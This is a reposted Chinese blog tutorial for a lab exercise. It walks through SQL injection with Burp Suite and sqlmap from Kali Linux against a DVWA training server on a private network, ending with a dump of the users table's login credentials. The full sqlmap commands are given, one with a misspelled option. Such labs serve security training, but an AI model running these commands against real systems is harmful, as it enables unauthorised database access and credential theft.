0


Kali linux SQLmap注入攻击实验简略操作

1.环境需求

kali linux虚拟机(本人2021.2版本)

Windows2008R2 已经部署的dvwa服务器

2.实验部分

先启动两台虚拟机,并且启动Windows2008R2上部署的phpstudy服务,作为kali端sql注入攻击的服务器预备。

(1)打开kali上的Burp suite和在火狐浏览器上输入之前部署的DVWA,然后登陆进去,选择dvwa security的安全级别为low并submit

(2)单击左边的sql injection功能

(3)在User id中输入1234(可随意输入)

(4)打开Burp suite的数据包捕获功能

(5)找到length为4804的HTML然后点击

(6)打开kali的终端并进入root,输入下边的命令

sqlmap -u "http://192.168.10.140//DVWA-master/vulnerabilities/sqli/?id=1234&Submit=Submit" --cookie="security=low; PHPSESSID=ruhp3ef5kfivq52mh07tg1qg95" --current-db

出现database:dvwa即为正确

(7)在上步命令的基础上,后面加上--tables用于探测该数据中的表

sqlmap -u "http://192.168.10.140//DVWA-master/vulnerabilities/sqli/?id=1234&Submit=Submit" --cookie="security=low; PHPSESSID=ruhp3ef5kfivq52mh07tg1qg95" --current-db --tables

出现database:dvwa则结果正确

(8)针对其中的一个表user,猜其中的字段

sqlmap -u "http://192.168.10.140//DVWA-master/vulnerabilities/sqli/?id=1234&Submit=Submit" --cookie="security=low; PHPSESSID=ruhp3ef5kfivq52mh07tg1qg95" --current-db --cloumns -Tusers

(9)执行以下命令,对users表中的所有字段的值进行猜解

sqlmap -u "http://192.168.10.140//DVWA-master/vulnerabilities/sqli/?id=1234&Submit=Submit" --cookie="security=low; PHPSESSID=ruhp3ef5kfivq52mh07tg1qg95" --dump -T users

有选择y/n的情况时,选择y即可

此处扫描时,如时间过长,则可以ctrl c即可

下图为扫描出来的dvwa sql的登录用户名和密码

最后返回dvwa登录主页面,根据上图或自己本机扫描出来用户名以及密码登录即可

查看箭头所示方向,是否和自己登录的用户名一致,一致则该实验成功。

标签: linux 安全 服务器

本文转载自: https://blog.csdn.net/Dream_chang/article/details/124813088
版权归原作者 Dream_chang 所有, 如有侵权,请联系我们删除。

“Kali linux SQLmap注入攻击实验简略操作”的评论:

还没有评论